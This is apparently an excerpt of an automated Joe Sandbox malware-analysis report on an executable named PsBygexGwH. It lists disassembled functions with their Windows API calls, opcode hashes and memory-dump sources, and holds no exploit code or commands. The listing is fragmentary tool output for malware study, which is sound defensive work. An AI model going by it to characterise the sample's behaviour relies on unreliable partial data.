Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 39988f64e5a42dab1c174354fed8eb7c1ae9b9df8030a5c3e8bad895953b2a7a
Instruction ID: 846d8cff31f59462a3e46bdbcdaed55a35b2dd59e54f2dc5b0b41ec79b4499ba
Opcode Fuzzy Hash: 39988f64e5a42dab1c174354fed8eb7c1ae9b9df8030a5c3e8bad895953b2a7a
Instruction Fuzzy Hash: 6411487590410AEFCB05DF58E940A9A7BF9EF48304F114059FC19AB312DB30DA25CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00129A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,0012543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00129A9C

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e4ceed1e4dd91c12069b289dac148f9a5ab7a42839ef4bcbaf9e001e730bcfbc
Instruction ID: e4bddaf5aed43a07a23b7788f3b8291047b78d27c4e66625408e09266802f64f
Opcode Fuzzy Hash: e4ceed1e4dd91c12069b289dac148f9a5ab7a42839ef4bcbaf9e001e730bcfbc
Instruction Fuzzy Hash: 2E1148312047159FEB24CF09E881BAAB7F9EF44764F10C42EE99B8BA51C770A955CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00155000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00154C7D: RtlAllocateHeap.NTDLL(00000008,00121129,00000000,?,00152E29,00000001,00000364,?,?,?,0014F2DE,00153863,001F1444,?,0013FDF5,?), ref: 00154CBE

_free.LIBCMT ref: 0015506C

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction ID: 57a22ebdff9d56364f60d3330ca1abfa173d60b10e7285fd230681e84c1db9e9
Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction Fuzzy Hash: 46012B722047049BE3218E55D84195AFBE9FB85371F25051DF9A49B2C0E7306809C774

Uniqueness

Uniqueness Score: -1.00%

Function 0014E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction ID: e7db4f11700876db091733c6f091e6e3ffd063803d151ec1bc14ab07b5a77e71
Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction Fuzzy Hash: 62F0A432511A14DADB313A79DC05B9A33DCAF72336F120719F835A72E2DB74D8068AA5

Uniqueness

Uniqueness Score: -1.00%

Function 00129CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00129CBD

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: e8927a259a13a384b7f8d17d197a21d4458e0330a19322b0a8ddd77362a479d3
Instruction ID: ee16ee1a6850dcf56b23618256d5a2cfbb7210098271c398a4325d927fab3607
Opcode Fuzzy Hash: e8927a259a13a384b7f8d17d197a21d4458e0330a19322b0a8ddd77362a479d3
Instruction Fuzzy Hash: 82F028B36006006ED7149F29D806B67BB94EF54760F10853EF619CB2D1DB31E420C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00154C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00121129,00000000,?,00152E29,00000001,00000364,?,?,?,0014F2DE,00153863,001F1444,?,0013FDF5,?), ref: 00154CBE

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 96fbfeb3f53814b9392c19cb35e3f2e9cad3ee64d0bd6b4cfb637325c0ca6005
Instruction ID: ef87a8ab743d6932f59bb388ea65c99bc9f9562a75837e15b7c13a134c34e0bc
Opcode Fuzzy Hash: 96fbfeb3f53814b9392c19cb35e3f2e9cad3ee64d0bd6b4cfb637325c0ca6005
Instruction Fuzzy Hash: EDF0E931602224E7DB215F66DC05F5A3788BFD17BAB154115BC39BF290CB70D88996E0

Uniqueness

Uniqueness Score: -1.00%

Function 00153820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,001F1444,?,0013FDF5,?,?,0012A976,00000010,001F1440,001213FC,?,001213C6,?,00121129), ref: 00153852

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: be4b43572b56cbb446ce85afe93eeabaed6474fca97ded6bb3622394c432cafa
Instruction ID: 7ffd40e25b62a93aa8806c93db49da96873ab40262bff36c0ff8669d151168fe
Opcode Fuzzy Hash: be4b43572b56cbb446ce85afe93eeabaed6474fca97ded6bb3622394c432cafa
Instruction Fuzzy Hash: B1E0E531100224E7D63926669C00B9A3648AB527F2F050325BC34AB9E0CB51DD0581E0

Uniqueness

Uniqueness Score: -1.00%

Function 00154D7A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00154D9C

Part of subcall function 001529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000), ref: 001529DE
Part of subcall function 001529C8: GetLastError.KERNEL32(00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000,00000000), ref: 001529F0

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction ID: e676c5422ac6c1e52d6dab429fb543bc39287b51f6106570763f4c4533d0922e
Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction Fuzzy Hash: 7EE06D361002059F8720CEACD400A92B7F4EF953257208529ECADD7310D331E856CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00124F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124F6D

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: e5732df6fbae33a928fd246901463005254bc6711736d7853a4a296e5ae809c3
Instruction ID: 3504facc0b8937b3beed818e0ccfb99e5bd37bde00a6f598d5b9efabe306f384
Opcode Fuzzy Hash: e5732df6fbae33a928fd246901463005254bc6711736d7853a4a296e5ae809c3
Instruction Fuzzy Hash: 23F03071105761CFDB389F68F590812B7E4FF54319311897EE1EA82521C7319894DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00122DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00122DC4

Part of subcall function 00126B57: _wcslen.LIBCMT ref: 00126B6A

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 03a98dbfce5ad959f6563421ad9b96753ad9d6d6771ac376705c79789d7992d5
Instruction ID: 19aee621cdcc0bed90cf21bc1d7eba188f6cdbefc6ce180ca12d8a63b6995ffc
Opcode Fuzzy Hash: 03a98dbfce5ad959f6563421ad9b96753ad9d6d6771ac376705c79789d7992d5
Instruction Fuzzy Hash: DFE0CD726001245BC72092589C05FDA77DDDFC8790F0401B1FD09D7248DB60AD848590

Uniqueness

Uniqueness Score: -1.00%

Function 00192693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 001926B5

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 5175dfc4ab9e320b71cacd7c5c1821ff376dd12ceae130ac01efd7e6635d66fc
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 28E04FB0609B005FDF399E28A8517B677E89F4A300F00086EFA9B83652E67268458A4D

Uniqueness

Uniqueness Score: -1.00%

Function 00122B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00123837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00123908

Part of subcall function 0012D730: GetInputState.USER32 ref: 0012D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00122B6B

Part of subcall function 001230F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0012314E

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 024737671d7df08885f2506604e3d6f73f282b4c5c02ed8f02c0676b66953d56
Instruction ID: 826114c51081a31d19feb1f72958eb6c58beb452020a4b5181e1e39abdf900f8
Opcode Fuzzy Hash: 024737671d7df08885f2506604e3d6f73f282b4c5c02ed8f02c0676b66953d56
Instruction Fuzzy Hash: D8E07D2130022C17C704BB74B81247DB349DBF1311F40053EF19247173CF2845B583A1

Uniqueness

Uniqueness Score: -1.00%

Function 023C08E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 023C08EB

Memory Dump Source

Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 09ad03ca8eb18f5a3a478278a6cc2d4f2881b231851de58e916655bc74bffedf
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: E5E0867150524CDBD71CCBB88D047A973B8D708314F204659E415C3191D6308D40D754

Uniqueness

Uniqueness Score: -1.00%

Function 023C08B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 023C08BB

Memory Dump Source

Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: f195843890c31a2b12f39a6277fd024fbbc876314e348f379aa32270b3d057a2
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 49D0A73190A30CEBCB10CFB49C04ADA73ACDB04320F108758FD15D3281D6319D409B90

Uniqueness

Uniqueness Score: -1.00%

Function 0016039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00160704,?,?,00000000,?,00160704,00000000,0000000C), ref: 001603B7

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9f7b47823d0fc6b92c9223170a26d0050d38dcf0a524ecdae04cffafcd24f79a
Instruction ID: 561157d79569ac7586af0f1972e164d2ca51e728bb43fb9ad0dc70c2ad9f927a
Opcode Fuzzy Hash: 9f7b47823d0fc6b92c9223170a26d0050d38dcf0a524ecdae04cffafcd24f79a
Instruction Fuzzy Hash: 96D06C3204010DFBDF029F84DD06EDA3BAAFB48714F014100BE1866020C732E861AB90

Uniqueness

Uniqueness Score: -1.00%

Function 00121CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00121CBC

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: e7396c59d0328b17ba927be60194ba8c58b9cd4de0ed84ebc77582ceec31209b
Instruction ID: 46888ee09dd54a2224ea22da113ef4584fd596137d869022d8959a534afae1c3
Opcode Fuzzy Hash: e7396c59d0328b17ba927be60194ba8c58b9cd4de0ed84ebc77582ceec31209b
Instruction Fuzzy Hash: 4DC09B36380305EFF2145780BC4AF607754B348B10F044001F60955DF3C3B11490D650

Uniqueness

Uniqueness Score: -1.00%

Function 0019744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00125745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0012949C,?,00008000), ref: 00125773

GetLastError.KERNEL32(00000002,00000000), ref: 001976DE

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 7a0895844175d715ef36ee5a8327fe42ad379f2d5dcc3232be1d6b94672ce1f4
Instruction ID: 0bb2bd52dc35eafcff403f9fd98cddaa6e201d53f0ede0c09fb4d633e07a122f
Opcode Fuzzy Hash: 7a0895844175d715ef36ee5a8327fe42ad379f2d5dcc3232be1d6b94672ce1f4
Instruction Fuzzy Hash: 0081AB306087119FDB14EF28D491A6EB7E1BF98714F04492DF88A5B2E2DB30ED55CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0013FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 0013FD1F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: eb75e4dc192ef99ac155202ee6393cc1b5625cd7346ddff0a9fb3486e1a78cab
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: A731F374A00109DBD718CF99D484969FBB1FF49310F2596A9E80ACB656D731EDC2DBC0

Uniqueness

Uniqueness Score: -1.00%

Function 023C22FC Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 023C2312

Memory Dump Source

Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3096e14d89e75d91452536fdabd5f28b039f6dbb9701e42d89b7019d45377341
Instruction ID: 1c4f6602db3d311531ac662211814a38eed1248d8ba90b18141aff62000f97e3
Opcode Fuzzy Hash: 3096e14d89e75d91452536fdabd5f28b039f6dbb9701e42d89b7019d45377341
Instruction Fuzzy Hash: 4E01B63194010EAFCF05EFE4C989AEEBB75FF04311F204559FA1AA6580DB30AA51CB61

Uniqueness

Uniqueness Score: -1.00%

Function 023C2300 Relevance: 1.3, APIs: 1, Instructions: 34sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 023C2312

Memory Dump Source

Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: dce1e67ee7a905aee1ad479c7a3e30644d0bd5a7b1fbfaf3e5e7a496efc26c57
Instruction ID: 74e874f0ba58a53292c611eed0f4045d18f08d8b8b151636d1d271fdb058361c
Opcode Fuzzy Hash: dce1e67ee7a905aee1ad479c7a3e30644d0bd5a7b1fbfaf3e5e7a496efc26c57
Instruction Fuzzy Hash: 4AF0797194410EAFCF05EFE4C949AEEBB75FF04311F604569FA1AA6180DB30EA51CB61

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001B9576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00139BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00139BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 001B961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001B965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 001B969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001B96C9
SendMessageW.USER32 ref: 001B96F2
GetKeyState.USER32(00000011), ref: 001B978B
GetKeyState.USER32(00000009), ref: 001B9798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001B97AE
GetKeyState.USER32(00000010), ref: 001B97B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001B97E9
SendMessageW.USER32 ref: 001B9810
SendMessageW.USER32(?,00001030,?,001B7E95), ref: 001B9918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 001B992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 001B9941
SetCapture.USER32(?), ref: 001B994A
ClientToScreen.USER32(?,?), ref: 001B99AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001B99BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001B99D6
ReleaseCapture.USER32 ref: 001B99E1
GetCursorPos.USER32(?), ref: 001B9A19
ScreenToClient.USER32(?,?), ref: 001B9A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 001B9A80
SendMessageW.USER32 ref: 001B9AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 001B9AEB
SendMessageW.USER32 ref: 001B9B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 001B9B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 001B9B4A
GetCursorPos.USER32(?), ref: 001B9B68
ScreenToClient.USER32(?,?), ref: 001B9B75
